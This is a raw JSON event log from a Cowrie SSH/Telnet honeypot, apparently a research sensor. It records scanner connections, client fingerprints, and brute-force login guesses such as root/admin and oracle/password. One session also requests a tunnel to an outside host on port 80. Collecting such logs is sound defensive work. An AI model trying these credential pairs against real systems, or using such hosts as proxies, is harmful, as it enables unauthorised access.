{"eventid":"cowrie.session.closed","duration":"13.5","message":"Connection lost after 13.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:34:50.063982Z","src_ip":"212.227.235.229","session":"1cd21d72e617"}
{"eventid":"cowrie.session.closed","duration":12.81515097618103,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:34:59.471312Z","src_ip":"212.227.125.160","session":"4321dd5bdadf"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":64680,"dst_ip":"1.2.3.4","dst_port":22,"session":"d127cab89000","protocol":"ssh","message":"New connection: 217.72.205.35:64680 (1.2.3.4:22) [session: d127cab89000]","sensor":"my-vps","timestamp":"2025-09-09T10:34:59.659843Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:34:59.661123Z","src_ip":"217.72.205.35","session":"d127cab89000"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43320,"dst_ip":"1.2.3.4","dst_port":23,"session":"7c31817c9fda","protocol":"telnet","message":"New connection: 212.227.125.160:43320 (1.2.3.4:23) [session: 7c31817c9fda]","sensor":"my-vps","timestamp":"2025-09-09T10:34:59.673040Z"}
{"eventid":"cowrie.session.closed","duration":12.783206939697266,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:35:12.456206Z","src_ip":"212.227.125.160","session":"7c31817c9fda"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43634,"dst_ip":"1.2.3.4","dst_port":23,"session":"8f2581c89cfa","protocol":"telnet","message":"New connection: 212.227.125.160:43634 (1.2.3.4:23) [session: 8f2581c89cfa]","sensor":"my-vps","timestamp":"2025-09-09T10:35:12.653310Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":483,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:35:14.697695Z","src_ip":"212.227.235.229","session":"093f523a7dfd"}
{"eventid":"cowrie.session.closed","duration":180.30146718025208,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:35:14.703705Z","src_ip":"212.227.235.229","session":"093f523a7dfd"}
{"eventid":"cowrie.session.closed","duration":12.809542417526245,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:35:25.462985Z","src_ip":"212.227.125.160","session":"8f2581c89cfa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43956,"dst_ip":"1.2.3.4","dst_port":23,"session":"fce965bf5f49","protocol":"telnet","message":"New connection: 212.227.125.160:43956 (1.2.3.4:23) [session: fce965bf5f49]","sensor":"my-vps","timestamp":"2025-09-09T10:35:25.661870Z"}
{"eventid":"cowrie.session.closed","duration":12.801603555679321,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:35:38.463406Z","src_ip":"212.227.125.160","session":"fce965bf5f49"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44285,"dst_ip":"1.2.3.4","dst_port":23,"session":"6a1349b9451c","protocol":"telnet","message":"New connection: 212.227.125.160:44285 (1.2.3.4:23) [session: 6a1349b9451c]","sensor":"my-vps","timestamp":"2025-09-09T10:35:38.662311Z"}
{"eventid":"cowrie.session.closed","duration":12.785110235214233,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:35:51.447966Z","src_ip":"212.227.125.160","session":"6a1349b9451c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44599,"dst_ip":"1.2.3.4","dst_port":23,"session":"de0b39f42e60","protocol":"telnet","message":"New connection: 212.227.125.160:44599 (1.2.3.4:23) [session: de0b39f42e60]","sensor":"my-vps","timestamp":"2025-09-09T10:35:51.662908Z"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.95","src_port":32812,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae360448d33a","protocol":"ssh","message":"New connection: 92.118.39.95:32812 (1.2.3.4:22) [session: ae360448d33a]","sensor":"my-vps","timestamp":"2025-09-09T10:36:03.629348Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:36:03.664977Z","src_ip":"92.118.39.95","session":"ae360448d33a"}
{"eventid":"cowrie.session.closed","duration":12.794195652008057,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:36:04.452606Z","src_ip":"212.227.125.160","session":"de0b39f42e60"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44914,"dst_ip":"1.2.3.4","dst_port":23,"session":"ed4c30928678","protocol":"telnet","message":"New connection: 212.227.125.160:44914 (1.2.3.4:23) [session: ed4c30928678]","sensor":"my-vps","timestamp":"2025-09-09T10:36:04.652206Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54740,"dst_ip":"1.2.3.4","dst_port":22,"session":"f1d6820bdb5b","protocol":"ssh","message":"New connection: 212.227.235.229:54740 (1.2.3.4:22) [session: f1d6820bdb5b]","sensor":"my-vps","timestamp":"2025-09-09T10:36:05.273069Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:36:05.273772Z","src_ip":"212.227.235.229","session":"f1d6820bdb5b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:36:05.531714Z","src_ip":"212.227.235.229","session":"f1d6820bdb5b"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"zabbix2025","message":"login attempt [zabbix/zabbix2025] failed","sensor":"my-vps","timestamp":"2025-09-09T10:36:06.630296Z","src_ip":"212.227.235.229","session":"f1d6820bdb5b"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:36:07.893818Z","src_ip":"212.227.235.229","session":"f1d6820bdb5b"}
{"eventid":"cowrie.session.closed","duration":12.743649959564209,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:36:17.396019Z","src_ip":"212.227.125.160","session":"ed4c30928678"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40448,"dst_ip":"1.2.3.4","dst_port":23,"session":"5de7b535d41d","protocol":"telnet","message":"New connection: 212.227.235.229:40448 (1.2.3.4:23) [session: 5de7b535d41d]","sensor":"my-vps","timestamp":"2025-09-09T10:37:14.963083Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-09-09T10:37:15.180501Z","src_ip":"212.227.235.229","session":"5de7b535d41d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T10:37:15.268190Z","src_ip":"212.227.235.229","session":"5de7b535d41d"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-09-09T10:37:15.271577Z","src_ip":"212.227.235.229","session":"5de7b535d41d"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-09-09T10:37:15.274156Z","src_ip":"212.227.235.229","session":"5de7b535d41d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":483,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:40:15.280348Z","src_ip":"212.227.235.229","session":"5de7b535d41d"}
{"eventid":"cowrie.session.closed","duration":180.3265564441681,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:40:15.288485Z","src_ip":"212.227.235.229","session":"5de7b535d41d"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.95","src_port":50388,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e0f10006cfe","protocol":"ssh","message":"New connection: 92.118.39.95:50388 (1.2.3.4:22) [session: 2e0f10006cfe]","sensor":"my-vps","timestamp":"2025-09-09T10:41:00.419231Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T10:41:00.424311Z","src_ip":"92.118.39.95","session":"2e0f10006cfe"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-09-09T10:41:00.455525Z","src_ip":"92.118.39.95","session":"2e0f10006cfe"}
{"eventid":"cowrie.login.failed","username":"solana","password":"solana","message":"login attempt [solana/solana] failed","sensor":"my-vps","timestamp":"2025-09-09T10:41:00.566326Z","src_ip":"92.118.39.95","session":"2e0f10006cfe"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:41:01.600229Z","src_ip":"92.118.39.95","session":"2e0f10006cfe"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":52476,"dst_ip":"1.2.3.4","dst_port":22,"session":"341fdf8eb628","protocol":"ssh","message":"New connection: 217.72.205.35:52476 (1.2.3.4:22) [session: 341fdf8eb628]","sensor":"my-vps","timestamp":"2025-09-09T10:41:44.854999Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:41:44.861630Z","src_ip":"217.72.205.35","session":"341fdf8eb628"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":65365,"dst_ip":"1.2.3.4","dst_port":22,"session":"6edbc5f9c6bb","protocol":"ssh","message":"New connection: 212.227.125.160:65365 (1.2.3.4:22) [session: 6edbc5f9c6bb]","sensor":"my-vps","timestamp":"2025-09-09T10:42:20.130892Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":1122,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a466f7f6ba2","protocol":"ssh","message":"New connection: 212.227.125.160:1122 (1.2.3.4:22) [session: 2a466f7f6ba2]","sensor":"my-vps","timestamp":"2025-09-09T10:42:20.140415Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:42:20.141773Z","src_ip":"212.227.125.160","session":"6edbc5f9c6bb"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T10:42:20.142522Z","src_ip":"212.227.125.160","session":"2a466f7f6ba2"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-09T10:42:20.255546Z","src_ip":"212.227.125.160","session":"2a466f7f6ba2"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-09T10:42:20.612782Z","src_ip":"212.227.125.160","session":"2a466f7f6ba2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-09T10:42:20.727001Z","session":"2a466f7f6ba2"}
{"eventid":"cowrie.session.closed","duration":"69.7","message":"Connection lost after 69.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:43:29.808889Z","src_ip":"212.227.125.160","session":"2a466f7f6ba2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54600,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d10d6472827","protocol":"ssh","message":"New connection: 212.227.125.160:54600 (1.2.3.4:22) [session: 3d10d6472827]","sensor":"my-vps","timestamp":"2025-09-09T10:43:51.470227Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T10:43:51.475943Z","src_ip":"212.227.125.160","session":"3d10d6472827"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-09-09T10:43:51.535710Z","src_ip":"212.227.125.160","session":"3d10d6472827"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"password","message":"login attempt [oracle/password] failed","sensor":"my-vps","timestamp":"2025-09-09T10:43:51.735857Z","src_ip":"212.227.125.160","session":"3d10d6472827"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:43:52.797904Z","src_ip":"212.227.125.160","session":"3d10d6472827"}
{"eventid":"cowrie.session.connect","src_ip":"139.19.117.131","src_port":49364,"dst_ip":"1.2.3.4","dst_port":22,"session":"e735d6ddefe2","protocol":"ssh","message":"New connection: 139.19.117.131:49364 (1.2.3.4:22) [session: e735d6ddefe2]","sensor":"my-vps","timestamp":"2025-09-09T10:46:27.732636Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T10:46:28.073710Z","src_ip":"139.19.117.131","session":"e735d6ddefe2"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-09-09T10:46:28.092107Z","src_ip":"139.19.117.131","session":"e735d6ddefe2"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"6d:05:de:1d:94:f4:4c:f6:92:7c:18:21:fa:9c:88:70","key":"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBTdKtwM0nNYabAq3tbWhGy6BELVnwQXZL4m+PidJ01o","type":"ssh-ed25519","message":"public key attempt for user admin of type ssh-ed25519 with fingerprint 6d:05:de:1d:94:f4:4c:f6:92:7c:18:21:fa:9c:88:70","sensor":"my-vps","timestamp":"2025-09-09T10:46:28.166084Z","src_ip":"139.19.117.131","session":"e735d6ddefe2"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"6d:05:de:1d:94:f4:4c:f6:92:7c:18:21:fa:9c:88:70","key":"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBTdKtwM0nNYabAq3tbWhGy6BELVnwQXZL4m+PidJ01o","type":"ssh-ed25519","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-09T10:46:28.167270Z","src_ip":"139.19.117.131","session":"e735d6ddefe2"}
{"eventid":"cowrie.session.closed","duration":"9.6","message":"Connection lost after 9.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:46:37.716479Z","src_ip":"139.19.117.131","session":"e735d6ddefe2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":63438,"dst_ip":"1.2.3.4","dst_port":22,"session":"c98cde7182bd","protocol":"ssh","message":"New connection: 212.227.125.160:63438 (1.2.3.4:22) [session: c98cde7182bd]","sensor":"my-vps","timestamp":"2025-09-09T10:46:47.101097Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-ZGrab ZGrab SSH Survey","message":"Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey","sensor":"my-vps","timestamp":"2025-09-09T10:46:48.013165Z","src_ip":"212.227.125.160","session":"c98cde7182bd"}
{"eventid":"cowrie.client.kex","hassh":"dd9bcf093c355da7000132131cb36fd0","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-rsa-cert-v00@openssh.com","ssh-dss-cert-v00@openssh.com","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","arcfour256","arcfour128","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","aes192-cbc","aes256-cbc","arcfour","rijndael-cbc@lysator.liu.se"],"macCS":["hmac-md5-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-ripemd160-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","hmac-md5","hmac-sha1","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-ripemd160","hmac-ripemd160@openssh.com","hmac-sha1-96","hmac-md5-96"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: dd9bcf093c355da7000132131cb36fd0","sensor":"my-vps","timestamp":"2025-09-09T10:46:49.519859Z","src_ip":"212.227.125.160","session":"c98cde7182bd"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:46:54.864758Z","src_ip":"212.227.125.160","session":"c98cde7182bd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58481,"dst_ip":"1.2.3.4","dst_port":23,"session":"c0ec11d669c1","protocol":"telnet","message":"New connection: 212.227.235.229:58481 (1.2.3.4:23) [session: c0ec11d669c1]","sensor":"my-vps","timestamp":"2025-09-09T10:47:09.008907Z"}
{"eventid":"cowrie.session.closed","duration":31.251702785491943,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:47:40.260118Z","src_ip":"212.227.235.229","session":"c0ec11d669c1"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.95","src_port":59428,"dst_ip":"1.2.3.4","dst_port":22,"session":"8525ae3b4e88","protocol":"ssh","message":"New connection: 92.118.39.95:59428 (1.2.3.4:22) [session: 8525ae3b4e88]","sensor":"my-vps","timestamp":"2025-09-09T10:48:03.279184Z"}
